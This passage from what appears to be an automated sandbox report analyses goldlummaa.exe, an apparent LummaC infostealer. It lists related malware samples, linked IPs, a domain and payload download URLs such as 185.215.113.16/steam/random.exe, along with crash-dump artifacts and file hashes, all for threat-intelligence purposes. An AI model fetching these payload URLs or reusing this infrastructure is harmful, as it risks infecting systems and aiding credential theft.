                                                                                            HCA Information:
                                                                                            • Successful, ratio: 97%
                                                                                            • Number of executed functions: 42
                                                                                            • Number of non-executed functions: 106
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.63, 4.245.163.56, 20.231.128.67
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: goldlummaa.exe
                                                                                            TimeTypeDescription
                                                                                            08:17:39API Interceptor8x Sleep call for process: goldlummaa.exe modified
                                                                                            08:18:42API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.21.50.161X2hna87N3Y.exeGet hashmaliciousLummaCBrowse
                                                                                              wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                                NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          hiip7UoiAq.exeGet hashmaliciousLummaCBrowse
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                185.215.113.16random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                • 185.215.113.16/inc/trunk.exe
                                                                                                                file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                • 185.215.113.16/steam/random.exe
                                                                                                                jYd7FUgGZc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 185.215.113.16/steam/random.exe
                                                                                                                V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 185.215.113.16/steam/random.exe
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 185.215.113.16/luma/random.exe
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 185.215.113.16/off/random.exe
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 185.215.113.16/steam/random.exe
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                • 185.215.113.16/luma/random.exe
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 185.215.113.16/steam/random.exe
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                tacitglibbr.bizjYd7FUgGZc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 188.114.96.6
                                                                                                                X2hna87N3Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                • 172.67.164.37
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 172.67.164.37
                                                                                                                wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 104.21.50.161
                                                                                                                qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                • 172.67.164.37
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.50.161
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUShnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                • 172.65.251.78
                                                                                                                ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 172.64.41.3
                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                • 172.65.251.78
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 104.21.23.76
                                                                                                                InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.220.223
                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                ScreenUpdateSync.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.24.223
                                                                                                                random.exe.10.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.23.76
                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.67.152
                                                                                                                cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.13.205
                                                                                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 185.215.113.43
                                                                                                                cred.dllGet hashmaliciousAmadeyBrowse
                                                                                                                • 185.215.113.209
                                                                                                                xxz.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 185.215.113.117
                                                                                                                88aext0k.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 185.215.113.217
                                                                                                                random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                • 185.215.113.17
                                                                                                                am209.exeGet hashmaliciousAmadeyBrowse
                                                                                                                • 185.215.113.209
                                                                                                                cred64.dll.dllGet hashmaliciousAmadeyBrowse
                                                                                                                • 185.215.113.209
                                                                                                                random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 185.215.113.43
                                                                                                                stealc_default2.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                • 185.215.113.17
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 185.215.113.43
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 104.21.50.161
                                                                                                                InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                ScreenUpdateSync.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                random.exe.10.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.50.161
                                                                                                                v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.50.161
                                                                                                                winrar-x64-701.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.50.161
                                                                                                                cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                winrar-x64-701.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.50.161
                                                                                                                No context
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.006881471647875
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:nh/pmB0JsAnbcA6afjGnty0zuiFXZ24IO8W5:JpTJsAnbcAvjSzuiFXY4IO8w
                                                                                                                MD5:884C0E70DA6539F9BDF4EB2C0B693D38
                                                                                                                SHA1:9964C45242BBF552739190A80F09A25C992BA1CD
                                                                                                                SHA-256:ADB33022F06ADE0B12024591CC965EE8A0751AFCC997DDD6C2743E79A6AF31C5
                                                                                                                SHA-512:684D617D8529662EBF7A13E920DC6151931843EBC256EA6FC6A880EF7B695A7278EEA0924EFDF2736C91E9CD882DC262A9E81A378D5B9E0A3D78CF6BB1A792FA
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.1.4.9.7.6.7.7.2.1.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.1.4.9.8.2.3.9.7.0.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.f.1.8.8.4.4.-.a.3.5.f.-.4.9.e.7.-.a.a.4.0.-.f.8.d.6.7.b.0.e.0.6.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.d.f.3.c.0.4.-.0.f.d.9.-.4.c.7.a.-.9.3.f.0.-.3.a.5.9.7.2.4.7.4.9.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.o.l.d.l.u.m.m.a.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.4.-.0.0.0.1.-.0.0.1.4.-.8.1.5.7.-.0.1.3.5.4.f.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.8.4.c.2.4.0.2.0.f.5.d.7.f.5.9.b.7.1.7.c.e.2.4.2.c.b.a.b.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.e.c.b.0.c.0.c.d.4.8.6.7.3.3.4.9.1.8.0.4.a.0.5.c.f.3.8.7.f.2.d.0.4.d.5.e.2.2.7.9.!.g.o.l.d.l.u.m.m.a.a...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.0070581367041216
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:lT0/qmb0bgi5afjGnty0zuiFXZ24IO8W5:REqpbgiajSzuiFXY4IO8w
                                                                                                                MD5:C194B79B25DF70E57C2A8E65A5292D0B
                                                                                                                SHA1:541CA2D42E3DFEC2539565873F526F92A85CEDD6
                                                                                                                SHA-256:3A09880B97FCB27E2166CC954094516A597B85EB5100090974CD9588E8D832F4
                                                                                                                SHA-512:A1BA0773A9E72D13A32DAA319C1A186C21BE1C6265AECFC59423A3ED028DE6881F230B0883063B7FCE29B9C6AE6B9B15EF7286E6F5E88A5D8339E115C2FCE0DA
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.1.5.2.2.9.0.7.8.6.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.1.5.2.3.3.7.6.6.1.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.e.a.5.a.1.0.-.5.a.3.7.-.4.d.a.8.-.8.1.c.8.-.6.0.0.9.e.a.7.d.7.f.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.d.f.a.5.0.0.-.6.2.7.3.-.4.5.c.9.-.9.a.4.e.-.b.6.5.5.d.5.0.2.2.0.4.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.o.l.d.l.u.m.m.a.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.4.-.0.0.0.1.-.0.0.1.4.-.8.1.5.7.-.0.1.3.5.4.f.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.8.4.c.2.4.0.2.0.f.5.d.7.f.5.9.b.7.1.7.c.e.2.4.2.c.b.a.b.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.e.c.b.0.c.0.c.d.4.8.6.7.3.3.4.9.1.8.0.4.a.0.5.c.f.3.8.7.f.2.d.0.4.d.5.e.2.2.7.9.!.g.o.l.d.l.u.m.m.a.a...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4623
                                                                                                                Entropy (8bit):4.474625275770936
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zsNJg77aI9alWpW8VYbYm8M4JM505T9/JOqFC+q8P5PUg9O8QO5vz25v3:uIjfnI7oU7VLJlJe38nQozg5d
                                                                                                                MD5:10D6F89DD5328DFA5C10FB8873F3C601
                                                                                                                SHA1:D16C6C107B37BB16FA7DADAB60BC5798EAF5F8DF
                                                                                                                SHA-256:4DD2DEB74A247E2120AC97A374E92CAD9F45908C5693647098A6C81C61C01D4C
                                                                                                                SHA-512:09D4D00E98360E1F3E14429930FDA3E32532AABB02DC1996E3AAF3B60A436E1D8B74AC1B6F7FD9D331B4BDA1E26CCAAD6EAE9C749B3C9B2A8A956DA5C1B4F4D4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636741" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 13:18:17 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):126132
                                                                                                                Entropy (8bit):1.9580412276950816
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:zeOC481Br1J9wvxlSnYOeLAkvXqe3q+Ftmwe3xwDNpVoMPVqmhN:DM1B5Pn7wqOq+uf+NY83hN
                                                                                                                MD5:2999BC23D052874697424FA00DD6358B
                                                                                                                SHA1:8BF575028CA9ACBB3F441EF5AF87EDDAE0B2A8FF
                                                                                                                SHA-256:54DD07C4D1BF71053A6AA49F08FDC74751307E62B939C53CB9D2AD3E7ACC3B22
                                                                                                                SHA-512:A1B6728583DA133AD8ECA68B62142BDDEB0DDED48518FD36DEB1A7BB0344477BDA5F572F1E99E49E7BD5CEE7A93DE450EE45DD13EA39992E6AC98B8DB7B91A09
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:MDMP..a..... .........bg............................(.......,...."..........TP..........`.......8...........T...........(B..............<#..........(%..............................................................................eJ.......%......GenuineIntel............T.......$...q.bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6362
                                                                                                                Entropy (8bit):3.7241942884437047
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJdf6IPYWzaAjAsprr89bRKsf7bm:R6lXJF6IPYQaAjAdRpfm
                                                                                                                MD5:BC25446AB6C953CA4A457C9B979D0226
                                                                                                                SHA1:B3FB1E893C7D6B018C8ECA55E2C44C37D3A25751
                                                                                                                SHA-256:797656B3CF27D4E816F15C25C3556A9C9D9092A7956DF573A84EF1C223695ECE
                                                                                                                SHA-512:D2B7CD41BFE37B92B0C011B3214FE0572F4862049065A9D89CD352BD282426BF281EE4DE5E4421E1D731CF713D371EC0F1F4C9634E12CE0665C37989CF9696D7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.0.<./.P.i.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4619
                                                                                                                Entropy (8bit):4.4734410099372965
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zsWJg77aI9alWpW8VYbMYm8M4JM505T9bBFg+q8P5Pn7HQO5vz25v5d:uIjfsI7oU7VAJZkEHQozg5d
                                                                                                                MD5:00EC86131D898DE54582BFE6511814BF
                                                                                                                SHA1:D612BA3C08789F61AD520EB5007C2E0CF1E8629B
                                                                                                                SHA-256:B99D578D70FFAA0417E88C14FAF12C6E34B547D78A9F29DF8125BE446327D8D0
                                                                                                                SHA-512:4960F1565B3BB2A641C20EB957DB4B4D155A7FB1257974A2067E87A4D9F3516F9F192E00CB30DED1CAA7B403DB36660684D86E1FA3A354BADA5D26AB3BC3C7AB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636740" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 13:18:43 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):122432
                                                                                                                Entropy (8bit):1.9737507369073177
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:iS8eOC4f4P1BIRS1J9wvxlSnYOeLskvXqeO+x1m02osWJwCLr61Sm+cG9O:iSagP1BIRiPnbwqZ+iisWOw+DG8
                                                                                                                MD5:3C204E69710E4C51E5D8147828080E7D
                                                                                                                SHA1:E4B6451F3AF9D62A012320411C30284EE174E270
                                                                                                                SHA-256:A36C262247B6F2B13952DB0FF18385EA9D963294509AAA5EAF0A051A091D26BC
                                                                                                                SHA-512:4A66DCB730415E06776D7F13529353DD50AD9B0A0DD00108B05B31B503968F000E0D776ED0FD2511238997D1AC44B7B7A011B09FFE5FA631B0135FECA1A13A75
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... .........bg............................(.......,...."..........TP..........`.......8...........T...........`A..............<#..........(%..............................................................................eJ.......%......GenuineIntel............T.......$...q.bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6352
                                                                                                                Entropy (8bit):3.7196574676071985
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:RSIU6o7wVetbdn6IhTKYWMmfkr5aMQURC89bPoKsf09em:R6l7wVeJdn6IhmYWx8pDRC89bQKsf0wm
                                                                                                                MD5:7DCB72F901DD5148BCB43506920DC6A4
                                                                                                                SHA1:2F5B7F3E341EE1733EF441ADDD0500667A3171D8
                                                                                                                SHA-256:E8DF4532A0A87837A358010F5EE613104785D5AC4B5E38B811EDF2201DB000B7
                                                                                                                SHA-512:EAB94EDE41658E6F0C408A5F798345DB4D84B16CC2CE8D5C7003C9F68E6E7209CC0CCA6416CE28FD7E629D5817053E8CD45A9DEAABAD2503B8DE4C2414971518
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.0.<./.P.i.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.393793366356998
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:il4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAqOBSqa:y4vF0MYQUMM6VFYSqU
                                                                                                                MD5:359227D5109C7949792CC522B55CDD8A
                                                                                                                SHA1:FDB1DF37A41D2326297CEC84A85A20DEE503AFB9
                                                                                                                SHA-256:DEFA0A370BECF3D1D7E71FE53BCBF3B0485401874DF132FDF79E088614396583
                                                                                                                SHA-512:649F9DC69116A3827CEB4BCC14DBD1A02E0EDBDA1C96EEA6CBD452950989A3B38BC18D2ABBFB00B9FC0073E7F7BE606A0326681F9B3F1625EAB748E32CF728CD
                                                                                                                Malicious:false
                                                                                                                Preview:regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..#MOQ............................................................................................................................................................................................................................................................................................................................................../D4y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.751338544197567
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:goldlummaa.exe
                                                                                                                File size:405'504 bytes
                                                                                                                MD5:876bf2dec67ea8626322d2c268219d76
                                                                                                                SHA1:ecb0c0cd486733491804a05cf387f2d04d5e2279
                                                                                                                SHA256:08d37bbc1881f5fbfdcc84e3270320bb4d03a3ad4fcdf1d996c9de0ca8f2b425
